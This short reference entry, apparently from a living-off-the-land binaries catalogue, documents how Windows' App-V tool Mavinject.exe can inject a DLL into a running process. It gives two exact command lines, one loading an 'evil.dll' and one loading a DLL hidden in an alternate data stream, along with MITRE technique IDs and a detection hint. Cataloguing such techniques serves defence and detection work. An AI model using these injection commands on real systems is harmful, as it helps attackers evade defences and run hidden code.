.. / Mavinject.exe
Star

Used by App-v in Windows


Paths:


Resources:
https://twitter.com/gN3mes1s/status/941315826107510784
https://twitter.com/Hexcorn/status/776122138063409152
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Acknowledgement:
Giuseppe N3mes1s - @gN3mes1s
Oddvar Moe - @oddvarmoe


Detection:
mavinject.exe should not run unless APP-v is in use on the workstation



Execute

Inject evil.dll into a process with PID 3110.
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Usecase:Inject dll file into running process
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1218



Alternate data streams

Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Usecase:Inject dll file into running process
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096